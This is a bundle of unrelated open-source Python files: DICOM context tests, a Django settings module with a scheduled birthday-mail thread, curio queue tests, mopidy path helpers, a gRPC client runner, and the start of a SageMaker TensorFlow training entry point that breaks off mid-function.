self.ae.remove_requested_context("1.2.840.10008.1.1")
assert len(self.ae.requested_contexts) == 0
# Test multiple
self.ae.add_requested_context("1.2.840.10008.1.1")
self.ae.add_requested_context(RTImageStorage)
self.ae.add_requested_context("1.2.840.10008.1.1", ["1.2.3.4"])
self.ae.remove_requested_context("1.2.840.10008.1.1", ["1.2.840.10008.1.2"])
assert len(self.ae.requested_contexts) == 3
context = self.ae.requested_contexts[0]
assert len(context.transfer_syntax) == 3
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES[1:]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert (
self.ae.requested_contexts[1].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
)
assert self.ae.requested_contexts[2].transfer_syntax == ["1.2.3.4"]
assert self.ae.requested_contexts[2].abstract_syntax == "1.2.840.10008.1.1"
self.ae.remove_requested_context("1.2.840.10008.1.1")
assert len(self.ae.requested_contexts) == 1
assert (
self.ae.requested_contexts[0].abstract_syntax
== "1.2.840.10008.5.1.4.1.1.481.1"
)
def test_remove_requested_context_all(self):
"""Tests for AE.remove_requested_context with all transfers."""
self.ae.add_requested_context("1.2.840.10008.1.1")
context = self.ae.requested_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert len(context.transfer_syntax) == 4
# Test singular
self.ae.remove_requested_context("1.2.840.10008.1.1", DEFAULT_TRANSFER_SYNTAXES)
assert len(self.ae.requested_contexts) == 0
# Test multiple
self.ae.add_requested_context(
"1.2.840.10008.1.1", [DEFAULT_TRANSFER_SYNTAXES[0]]
)
self.ae.add_requested_context(
"1.2.840.10008.1.1", DEFAULT_TRANSFER_SYNTAXES[1:]
)
self.ae.add_requested_context(RTImageStorage)
self.ae.remove_requested_context("1.2.840.10008.1.1", DEFAULT_TRANSFER_SYNTAXES)
assert len(self.ae.requested_contexts) == 1
context = self.ae.requested_contexts[0]
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert context.abstract_syntax == "1.2.840.10008.5.1.4.1.1.481.1"
def test_remove_requested_context_all_plus(self):
"""Test remove_requested_context with extra transfers"""
tsyntax = DEFAULT_TRANSFER_SYNTAXES[:]
tsyntax.append("1.2.3")
# Test singular
self.ae.add_requested_context("1.2.840.10008.1.1")
context = self.ae.requested_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert len(context.transfer_syntax) == 4
self.ae.remove_requested_context("1.2.840.10008.1.1", tsyntax)
assert len(self.ae.requested_contexts) == 0
# Test multiple
self.ae.add_requested_context(
"1.2.840.10008.1.1", [DEFAULT_TRANSFER_SYNTAXES[0]]
)
self.ae.add_requested_context(
"1.2.840.10008.1.1", DEFAULT_TRANSFER_SYNTAXES[1:]
)
self.ae.add_requested_context(RTImageStorage)
self.ae.remove_requested_context("1.2.840.10008.1.1", tsyntax)
assert len(self.ae.requested_contexts) == 1
context = self.ae.requested_contexts[0]
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert context.abstract_syntax == "1.2.840.10008.5.1.4.1.1.481.1"
|
settings_20210906113314.py
|
"""
Django settings for First_Wish project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
import environ
import threading
import schedule
import time
from First_Wish_Main_App.views import decrease_day_count_and_send_bday_mails
env_path = os.path.join(os.path.dirname(__file__), '../.env')
environ.Env.read_env(env_path)
# ///////////////////////////////SCHEDULE THE decrease_day_count_and_send_bday_mails ////////////////////
# Schedule the task to run once a day (currently at 11:32)
schedule.every().day.at("11:32").do(decrease_day_count_and_send_bday_mails)
# schedule.every().day.at("01:00").do(delete_task_and_add_store_datewise)
def func():
while True:
print("======Runnning==========")
schedule.run_pending()
time.sleep(1)
t1 = threading.Thread(target=func)
t1.start()
# ///////////////////////////////SCHEDULE THE decrease_day_count_and_send_bday_mails ENDS////////////////////
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
templates_path=os.path.join(BASE_DIR,'templates')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ.get('DJANGO_SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'First_Wish_Main_App',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'First_Wish.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [templates_path],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'First_Wish.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Kolkata'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
|
test_queue.py
|
# test_queue.py
from collections import deque
from curio import *
import time
import threading
from curio.traps import _read_wait
def test_queue_simple(kernel):
results = []
async def consumer(queue, label):
while True:
item = await queue.get()
if item is None:
break
results.append((label, item))
await queue.task_done()
await queue.task_done()
results.append(label + ' done')
async def producer():
queue = Queue()
results.append('producer_start')
await spawn(consumer(queue, 'cons1'))
await spawn(consumer(queue, 'cons2'))
await sleep(0.1)
for n in range(4):
await queue.put(n)
await sleep(0.1)
for n in range(2):
await queue.put(None)
results.append('producer_join')
await queue.join()
results.append('producer_done')
kernel.run(producer())
assert results == [
'producer_start',
('cons1', 0),
('cons2', 1),
('cons1', 2),
('cons2', 3),
'producer_join',
'cons1 done',
'cons2 done',
'producer_done',
]
def test_queue_simple_iter(kernel):
results = []
async def consumer(queue, label):
async for item in queue:
if item is None:
break
results.append((label, item))
await queue.task_done()
await queue.task_done()
results.append(label + ' done')
async def producer():
queue = Queue()
results.append('producer_start')
await spawn(consumer(queue, 'cons1'))
await spawn(consumer(queue, 'cons2'))
await sleep(0.1)
for n in range(4):
await queue.put(n)
await sleep(0.1)
for n in range(2):
await queue.put(None)
results.append('producer_join')
await queue.join()
results.append('producer_done')
kernel.run(producer())
assert results == [
'producer_start',
('cons1', 0),
('cons2', 1),
('cons1', 2),
('cons2', 3),
'producer_join',
'cons1 done',
'cons2 done',
'producer_done',
]
def test_queue_unbounded(kernel):
results = []
async def consumer(queue, label):
while True:
item = await queue.get()
if item is None:
break
results.append((label, item))
await queue.task_done()
await queue.task_done()
results.append(label + ' done')
async def producer():
queue = Queue()
results.append('producer_start')
await spawn(consumer(queue, 'cons1'))
await sleep(0.1)
for n in range(4):
await queue.put(n)
await queue.put(None)
results.append('producer_join')
await queue.join()
results.append('producer_done')
kernel.run(producer())
assert results == [
'producer_start',
'producer_join',
('cons1', 0),
('cons1', 1),
('cons1', 2),
('cons1', 3),
'cons1 done',
'producer_done',
]
def test_queue_bounded(kernel):
results = []
async def consumer(queue, label):
while True:
item = await queue.get()
if item is None:
break
results.append((label, item))
await sleep(0.1)
await queue.task_done()
await queue.task_done()
results.append(label + ' done')
async def producer():
queue = Queue(maxsize=2)
results.append('producer_start')
await spawn(consumer(queue, 'cons1'))
await sleep(0.1)
for n in range(4):
await queue.put(n)
results.append(('produced', n))
await queue.put(None)
results.append('producer_join')
await queue.join()
results.append('producer_done')
kernel.run(producer())
assert results == [
'producer_start',
('produced', 0),
('produced', 1),
('cons1', 0),
('produced', 2),
('cons1', 1),
('produced', 3),
('cons1', 2),
'producer_join',
('cons1', 3),
'cons1 done',
'producer_done',
]
def test_queue_get_cancel(kernel):
# Make sure a blocking get can be cancelled
results = []
async def consumer():
queue = Queue()
try:
results.append('consumer waiting')
item = await queue.get()
results.append('not here')
except CancelledError:
results.append('consumer cancelled')
async def driver():
task = await spawn(consumer())
await sleep(0.5)
await task.cancel()
kernel.run(driver())
assert results == [
'consumer waiting',
'consumer cancelled'
]
def test_queue_put_cancel(kernel):
# Make sure a blocking put() can be cancelled
results = []
async def producer():
queue = Queue(1)
results.append('producer_start')
await queue.put(0)
try:
await queue.put(1)
results.append('not here')
except CancelledError:
results.append('producer_cancel')
async def driver():
task = await spawn(producer())
await sleep(0.5)
await task.cancel()
kernel.run(driver())
assert results == [
'producer_start',
'producer_cancel'
]
def test_queue_get_timeout(kernel):
# Make sure a blocking get respects timeouts
results = []
async def consumer():
queue = Queue()
try:
results.append('consumer waiting')
item = await timeout_after(0.5, queue.get())
results.append('not here')
except TaskTimeout:
results.append('consumer timeout')
kernel.run(consumer())
assert results == [
'consumer waiting',
'consumer timeout'
]
def test_queue_put_timeout(kernel):
# Make sure a blocking put() respects timeouts
results = []
async def producer():
queue = Queue(1)
results.append('producer start')
await queue.put(0)
try:
await timeout_after(0.5, queue.put(1))
results.append('not here')
except TaskTimeout:
results.append('producer timeout')
kernel.run(producer())
assert results == [
'producer start',
'producer timeout'
]
def test_queue_qsize(kernel):
async def main():
q = Queue()
repr(q)
await q.put(1)
assert q.qsize() == 1
kernel.run(main)
def test_priority_queue(kernel):
results = []
priorities = [4, 2, 1, 3]
async def consumer(queue):
while True:
item = await queue.get()
if item[1] is None:
break
results.append(item[1])
await queue.task_done()
await sleep(0.2)
await queue.task_done()
async def producer():
queue = PriorityQueue()
for n in priorities:
await queue.put((n, n))
await queue.put((10, None))
await spawn(consumer(queue))
await queue.join()
kernel.run(producer())
assert results == sorted(priorities)
def test_lifo_queue(kernel):
results = []
items = range(4)
async def consumer(queue):
while True:
item = await queue.get()
if item is None:
break
results.append(item)
await queue.task_done()
await sleep(0.2)
await queue.task_done()
async def producer():
queue = LifoQueue()
await queue.put(None)
for n in items:
await queue.put(n)
await spawn(consumer(queue))
await queue.join()
kernel.run(producer())
assert results == list(reversed(items))
def test_univ_queue_basic(kernel):
q = UniversalQueue()
assert q.empty()
assert q.qsize() == 0
assert not q.full()
def test_univ_queue_sync_async(kernel):
result = [ ]
async def consumer(q):
while True:
item = await q.get()
if item is None:
break
result.append(item)
await q.task_done()
def producer(q):
for i in range(10):
q.put(i)
time.sleep(0.1)
q.join()
assert True
async def main():
q = UniversalQueue()
t1 = await spawn(consumer(q))
t2 = threading.Thread(target=producer, args=(q,))
t2.start()
await run_in_thread(t2.join)
await q.put(None)
await t1.join()
assert result == [0,1,2,3,4,5,6,7,8,9]
kernel.run(main())
def test_univ_queue_async_sync(kernel):
result = []
def consumer(q):
while True:
item = q.get()
if item is None:
break
result.append(item)
q.task_done()
async def producer(q):
for i in range(10):
await q.put(i)
await sleep(0.1)
await q.join()
async def main():
q = UniversalQueue()
t1 = threading.Thread(target=consumer, args=(q,))
t1.start()
t2 = await spawn(producer(q))
await t2.join()
await q.put(None)
await run_in_thread(t1.join)
assert result == [0,1,2,3,4,5,6,7,8,9]
kernel.run(main())
def test_univ_queue_cancel(kernel):
result = []
async def consumer(q):
while True:
try:
item = await timeout_after(0.1, q.get())
except TaskTimeout:
continue
if item is None:
break
result.append(item)
await q.task_done()
def producer(q):
for i in range(10):
q.put(i)
time.sleep(0.2)
q.join()
async def main():
q = UniversalQueue(maxsize=2)
t1 = await spawn(consumer(q))
t2 = threading.Thread(target=producer, args=(q,))
t2.start()
await run_in_thread(t2.join)
await q.put(None)
await t1.join()
assert result == [0,1,2,3,4,5,6,7,8,9]
kernel.run(main())
def test_univ_queue_multiple_consumer(kernel):
result = []
async def consumer(q):
while True:
item = await q.get()
if item is None:
break
result.append(item)
await q.task_done()
def producer(q):
for i in range(1000):
q.put(i)
q.join()
async def main():
q = UniversalQueue(maxsize=10)
t1 = await spawn(consumer(q))
t2 = await spawn(consumer(q))
t3 = await spawn(consumer(q))
t4 = threading.Thread(target=producer, args=(q,))
t4.start()
await run_in_thread(t4.join)
await q.put(None)
await q.put(None)
await q.put(None)
await t1.join()
await t2.join()
await t3.join()
assert list(range(1000)) == sorted(result)
kernel.run(main())
def test_univ_queue_multiple_kernels(kernel):
result = []
async def consumer(q):
while True:
item = await q.get()
if item is None:
break
result.append(item)
await q.task_done()
def producer(q):
for i in range(1000):
q.put(i)
q.join()
async def main():
q = UniversalQueue(maxsize=10)
t1 = threading.Thread(target=run, args=(consumer(q),))
t1.start()
t2 = threading.Thread(target=run, args=(consumer(q),))
t2.start()
t3 = threading.Thread(target=run, args=(consumer(q),))
t3.start()
t4 = threading.Thread(target=producer, args=(q,))
t4.start()
await run_in_thread(t4.join)
await q.put(None)
await q.put(None)
await q.put(None)
t1.join()
t2.join()
t3.join()
assert list(range(1000)) == sorted(result)
kernel.run(main())
def test_univ_queue_withfd(kernel):
result = [ ]
async def consumer(q):
while True:
await _read_wait(q)
item = await q.get()
if item is None:
break
result.append(item)
await q.task_done()
def producer(q):
for i in range(10):
q.put(i)
time.sleep(0.1)
q.join()
assert True
async def main():
q = UniversalQueue(withfd=True)
t1 = await spawn(consumer(q))
t2 = threading.Thread(target=producer, args=(q,))
t2.start()
await run_in_thread(t2.join)
await q.put(None)
await t1.join()
assert result == [0,1,2,3,4,5,6,7,8,9]
kernel.run(main())
def test_uqueue_simple_iter(kernel):
async def consumer(queue):
results = []
async for item in queue:
if item is None:
break
results.append(item)
assert results == list(range(10))
def tconsumer(queue):
results = []
for item in queue:
if item is None:
break
results.append(item)
assert results == list(range(10))
async def producer():
queue = UniversalQueue()
t = await spawn(consumer, queue)
for n in range(10):
await queue.put(n)
await queue.put(None)
await t.join()
t = threading.Thread(target=tconsumer, args=(queue,))
t.start()
for n in range(10):
await queue.put(n)
await queue.put(None)
await run_in_thread(t.join)
kernel.run(producer())
def test_uqueue_asyncio_iter(kernel):
async def consumer(queue):
results = []
async for item in queue:
if item is None:
break
results.append(item)
assert results == list(range(10))
async def producer():
queue = UniversalQueue(maxsize=2)
async with AsyncioLoop() as loop:
t = await spawn(loop.run_asyncio(consumer, queue))
for n in range(10):
await queue.put(n)
await queue.put(None)
await t.join()
kernel.run(producer())
def test_uqueue_asyncio_prod(kernel):
async def consumer():
queue = UniversalQueue(maxsize=2)
async with AsyncioLoop() as loop:
t = await spawn(loop.run_asyncio(producer, queue))
results = []
async for item in queue:
await queue.task_done()
if item is None:
break
results.append(item)
assert results == list(range(10))
await t.join()
async def producer(queue):
for n in range(10):
await queue.put(n)
await queue.put(None)
await queue.join()
kernel.run(consumer())
def test_uqueue_withfd_corner(kernel):
async def main():
queue = UniversalQueue(withfd=True)
await queue.put(1)
queue._get_sock.recv(1000) # Drain the socket
item = await queue.get()
assert item == 1
# Fill the I/O buffer
while True:
try:
queue._put_sock.send(b'x'*10000)
except BlockingIOError:
break
# Make sure this doesn't fail
await queue.put(2)
item = await queue.get()
assert item == 2
kernel.run(main)
def test_uqueue_put_cancel(kernel):
async def main():
queue = UniversalQueue(maxsize=1)
await queue.put(1)
try:
await timeout_after(0.1, queue.put(2))
assert False
except TaskTimeout:
assert True
kernel.run(main)
|
path.py
|
from __future__ import absolute_import, unicode_literals
import logging
import os
import re
import stat
import threading
from mopidy import compat, exceptions
from mopidy.compat import queue, urllib
from mopidy.internal import encoding, xdg
logger = logging.getLogger(__name__)
XDG_DIRS = xdg.get_dirs()
def get_or_create_dir(dir_path):
if not isinstance(dir_path, bytes):
raise TypeError('dir_path is not a bytestring: %r' % dir_path)
dir_path = expand_path(dir_path)
if os.path.isfile(dir_path):
raise OSError(
'A file with the same name as the desired dir, '
'"%s", already exists.' % dir_path)
elif not os.path.isdir(dir_path):
logger.info('Creating dir %s', dir_path)
os.makedirs(dir_path, 0o755)
return dir_path
def get_or_create_file(file_path, mkdir=True, content=None):
if not isinstance(file_path, bytes):
raise TypeError('file_path is not a bytestring: %r' % file_path)
file_path = expand_path(file_path)
if isinstance(content, compat.text_type):
content = content.encode('utf-8')
if mkdir:
get_or_create_dir(os.path.dirname(file_path))
if not os.path.isfile(file_path):
logger.info('Creating file %s', file_path)
with open(file_path, 'wb') as fh:
if content is not None:
fh.write(content)
return file_path
def get_unix_socket_path(socket_path):
match = re.search('^unix:(.*)', socket_path)
if not match:
return None
return match.group(1)
def path_to_uri(path):
"""
Convert an OS-specific path to a file:// URI.
Accepts either unicode strings or bytestrings. The encoding of any
bytestring will be maintained so that :func:`uri_to_path` can return the
same bytestring.
Returns a file:// URI as a unicode string.
"""
if isinstance(path, compat.text_type):
path = path.encode('utf-8')
if compat.PY2:
path = urllib.parse.quote(path)
else:
path = urllib.parse.quote_from_bytes(path)
return urllib.parse.urlunsplit(('file', '', path, '', ''))
def uri_to_path(uri):
"""
Convert a URI to an OS-specific path.
Returns a bytestring, since the file path can contain characters in an
encoding other than UTF-8.
If we had returned these paths as unicode strings, you wouldn't be able to
look up the matching dir or file on your file system because the exact path
would be lost by ignoring its encoding.
"""
if compat.PY2:
if isinstance(uri, compat.text_type):
uri = uri.encode('utf-8')
return urllib.parse.unquote(urllib.parse.urlsplit(uri).path)
else:
return urllib.parse.unquote_to_bytes(urllib.parse.urlsplit(uri).path)
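# Illustrative round trip for the two helpers above (the path is an example, not part
# of the original module); the bytestring's encoding survives the URI form:
#   path_to_uri(b'/music/caf\xc3\xa9.flac')     -> 'file:///music/caf%C3%A9.flac'
#   uri_to_path('file:///music/caf%C3%A9.flac') -> b'/music/caf\xc3\xa9.flac'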
def split_path(path):
if not isinstance(path, bytes):
raise TypeError('path is not a bytestring: %r' % path)
parts = []
while True:
path, part = os.path.split(path)
if part:
parts.insert(0, part)
if not path or path == b'/':
break
return parts
def expand_path(path):
# TODO: document as we want people to use this.
if not isinstance(path, bytes):
raise TypeError('path is not a bytestring: %r' % path)
for xdg_var, xdg_dir in XDG_DIRS.items():
var = ('$' + xdg_var).encode('utf-8')
path = path.replace(var, xdg_dir)
if b'$' in path:
return None
path = os.path.expanduser(path)
path = os.path.abspath(path)
return path
def _find_worker(relative, follow, done, work, results, errors):
"""Worker thread for collecting stat() results.
:param str relative: directory to make results relative to
:param bool follow: if symlinks should be followed
:param threading.Event done: event indicating that all work has been done
:param queue.Queue work: queue of paths to process
:param dict results: shared dictionary for storing all the stat() results
:param dict errors: shared dictionary for storing any per path errors
"""
while not done.is_set():
try:
entry, parents = work.get(block=False)
except queue.Empty:
continue
if relative:
path = os.path.relpath(entry, relative)
else:
path = entry
try:
if follow:
st = os.stat(entry)
else:
st = os.lstat(entry)
if (st.st_dev, st.st_ino) in parents:
errors[path] = exceptions.FindError('Sym/hardlink loop found.')
continue
parents = parents + [(st.st_dev, st.st_ino)]
if stat.S_ISDIR(st.st_mode):
for e in os.listdir(entry):
work.put((os.path.join(entry, e), parents))
elif stat.S_ISREG(st.st_mode):
results[path] = st
elif stat.S_ISLNK(st.st_mode):
errors[path] = exceptions.FindError('Not following symlinks.')
else:
errors[path] = exceptions.FindError('Not a file or directory.')
except OSError as e:
errors[path] = exceptions.FindError(
encoding.locale_decode(e.strerror), e.errno)
finally:
work.task_done()
def _find(root, thread_count=10, relative=False, follow=False):
"""Threaded find implementation that provides stat results for files.
Tries to protect against sym/hardlink loops by keeping an eye on parent
(st_dev, st_ino) pairs.
:param str root: root directory to search from, may not be a file
:param int thread_count: number of workers to use, mainly useful to
mitigate network lag when scanning on NFS etc.
:param bool relative: if results should be relative to root or absolute
:param bool follow: if symlinks should be followed
"""
threads = []
results = {}
errors = {}
done = threading.Event()
work = queue.Queue()
work.put((os.path.abspath(root), []))
if not relative:
root = None
args = (root, follow, done, work, results, errors)
for i in range(thread_count):
t = threading.Thread(target=_find_worker, args=args)
t.daemon = True
t.start()
threads.append(t)
work.join()
done.set()
for t in threads:
t.join()
return results, errors
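# Minimal usage sketch for the threaded find above (the directory name is
# hypothetical): stat every regular file below a root, keyed by path relative
# to that root.
#   results, errors = _find(b'/srv/media', thread_count=4, relative=True)
#   for path, st in results.items():
#       print(path, st.st_size)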
def find_mtimes(root, follow=False):
results, errors = _find(root, relative=False, follow=follow)
# return the mtimes as integer milliseconds
mtimes = {f: int(st.st_mtime * 1000) for f, st in results.items()}
return mtimes, errors
def is_path_inside_base_dir(path, base_path):
if not isinstance(path, bytes):
raise TypeError('path is not a bytestring')
if not isinstance(base_path, bytes):
raise TypeError('base_path is not a bytestring')
if compat.PY2:
path_separator = os.sep
else:
path_separator = os.sep.encode()
if path.endswith(path_separator):
raise ValueError(
'path %r cannot end with a path separator' % path)
# Expand symlinks
real_base_path = os.path.realpath(base_path)
real_path = os.path.realpath(path)
if os.path.isfile(path):
# Use dir of file for prefix comparison, so we don't accept
# /tmp/foo.m3u as being inside /tmp/foo, simply because they have a
# common prefix, /tmp/foo, which matches the base path, /tmp/foo.
real_path = os.path.dirname(real_path)
# Check if dir of file is the base path or a subdir
common_prefix = os.path.commonprefix([real_base_path, real_path])
return common_prefix == real_base_path
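# Hedged examples for the containment check above; paths are illustrative and assume
# the files exist and no symlinks are involved (this mirrors the /tmp/foo.m3u case
# noted in the comment inside the function):
#   is_path_inside_base_dir(b'/tmp/foo/song.mp3', b'/tmp/foo') -> True
#   is_path_inside_base_dir(b'/tmp/foo.m3u', b'/tmp/foo')      -> False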
# FIXME replace with mock usage in tests.
class Mtime(object):
def __init__(self):
self.fake = None
def __call__(self, path):
if self.fake is not None:
return self.fake
return int(os.stat(path).st_mtime)
def set_fake_time(self, time):
self.fake = time
def undo_fake(self):
self.fake = None
mtime = Mtime()
|
client_runner.py
|
# Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Defines behavior for WHEN clients send requests.
Each client exposes a non-blocking send_request() method that the
ClientRunner invokes either periodically or in response to some event.
"""
import abc
import threading
import time
class ClientRunner:
"""Abstract interface for sending requests from clients."""
__metaclass__ = abc.ABCMeta
def __init__(self, client):
self._client = client
@abc.abstractmethod
def start(self):
raise NotImplementedError()
@abc.abstractmethod
def stop(self):
raise NotImplementedError()
class OpenLoopClientRunner(ClientRunner):
def __init__(self, client, interval_generator):
super(OpenLoopClientRunner, self).__init__(client)
self._is_running = False
self._interval_generator = interval_generator
self._dispatch_thread = threading.Thread(
target=self._dispatch_requests, args=())
def start(self):
self._is_running = True
self._client.start()
self._dispatch_thread.start()
def stop(self):
self._is_running = False
self._client.stop()
self._dispatch_thread.join()
self._client = None
def _dispatch_requests(self):
while self._is_running:
self._client.send_request()
time.sleep(next(self._interval_generator))
class ClosedLoopClientRunner(ClientRunner):
def __init__(self, client, request_count):
super(ClosedLoopClientRunner, self).__init__(client)
self._is_running = False
self._request_count = request_count
# Send a new request on each response for closed loop
self._client.add_response_callback(self._send_request)
def start(self):
self._is_running = True
self._client.start()
for _ in xrange(self._request_count):
self._client.send_request()
def stop(self):
self._is_running = False
self._client.stop()
self._client = None
def _send_request(self, client, response_time):
if self._is_running:
client.send_request()
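# Usage sketch for the two runners above. `EchoClient` and `poisson_intervals` are
# hypothetical stand-ins for a concrete client and an inter-arrival-time generator;
# neither is defined in this module.
#   runner = OpenLoopClientRunner(EchoClient(), poisson_intervals(rate_per_second=10))
#   runner.start()
#   time.sleep(30)   # let requests flow for a while
#   runner.stop()
#   runner = ClosedLoopClientRunner(EchoClient(), request_count=100)
#   runner.start()   # sends 100 initial requests, then one more per response received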
|
train_entry_point.py
|
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
import argparse
import json
import os
import subprocess
import time
from threading import Thread
import tensorflow as tf
import container_support as cs
import tf_container.run
import tf_container.s3_fs as s3_fs
import tf_container.serve as serve
_logger = tf_container.run.get_logger()
def _wait_until_master_is_down(master):
while True:
try:
# this subprocess call is python 2/3 compatible and will throw an exception when the status code is != 0
subprocess.check_call(['curl', '{}:2222'.format(master)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
time.sleep(10)
except subprocess.CalledProcessError:
_logger.info("master {} is down, stopping parameter server".format(master))
return
def save_tf_config_env_var(tf_config):
os.environ['TF_CONFIG'] = json.dumps(tf_config)
_logger.info('----------------------TF_CONFIG--------------------------')
_logger.info(os.environ['TF_CONFIG'])
_logger.info('---------------------------------------------------------')
def _run_ps_server(current_host, hosts, tf_config):
"""After the training finishes, parameter servers won't stop running because server.join() has an infinite loop.
That is a known issue: https://github.com/tensorflow/ecosystem/issues/19
The solution below runs the parameter server in a secondary thread while the main thread pings the master,
waiting for it to stop responding. After that, the application exits gracefully, given that Python threads
cannot be stopped.
Args:
current_host: (str) name of the current host
hosts: list (str) list of all the hostnames
tf_config: dict (str) tensorflow config map
Returns:
"""
def start_ps_server(current_host, hosts, tf_config):
cluster_spec = tf.train.ClusterSpec(tf_config['cluster'])
task_index = hosts.index(current_host)
server = tf.train.Server(cluster_spec, job_name='ps', task_index=task_index)
server.join()
t = Thread(target=start_ps_server, args=(current_host, hosts, tf_config))
t.start()
def _get_default_training_params(env):
my_parser = argparse.ArgumentParser()
my_parser.add_argument('--training_steps', type=int, default=1000)
my_parser.add_argument('--evaluation_steps', type=int, default=100)
hp = env.argparse_hyperparameters(my_parser)
return hp.training_steps, hp.evaluation_steps
def _get_master(tf_config):
return tf_config['cluster']['master'][0][:-5]
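# Illustrative only (host names and port numbers below are assumptions, not
# taken from this file): a tf_config for a two-host job might look roughly like
#   {'cluster': {'master': ['algo-1:2222'], 'worker': ['algo-2:2222'],
#                'ps': ['algo-1:2223', 'algo-2:2223']},
#    'task': {'type': 'master', 'index': 0}, 'environment': 'cloud'}
# so _get_master() above strips the trailing ':2222' (5 characters) to recover
# the bare master host name.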
def _get_trainer_class():
# We used the Experiment API in tf.contrib.learn initially. It's not
# officially supported, and it's not working properly with TF 1.6, so
# we've switched to using tf.estimator.train_and_evaluate instead for
# versions 1.6 and up. However, we still want to use the old API for
# 1.4 and 1.5, since the new API isn't fully backwards compatible.
major, minor, patch = tf.__version__.split('.')
if major != '1':
raise ValueError('We only support TensorFlow 1.x.y currently.')
if minor in ['4', '5']:
import tf_container.experiment_trainer
return tf_container.experiment_trainer.Trainer
import tf_container.trainer_optimizer
return tf_container.trainer_optimizer.TrainerBayesOptimizer
def _get_checkpoint_dir(env):
if 'checkpoint_path' not in env.hyperparameters:
return env.model_dir
checkpoint_path = env.hyperparameters['checkpoint_path']
# If this is not part of a tuning job, then we can just use the specified checkpoint path
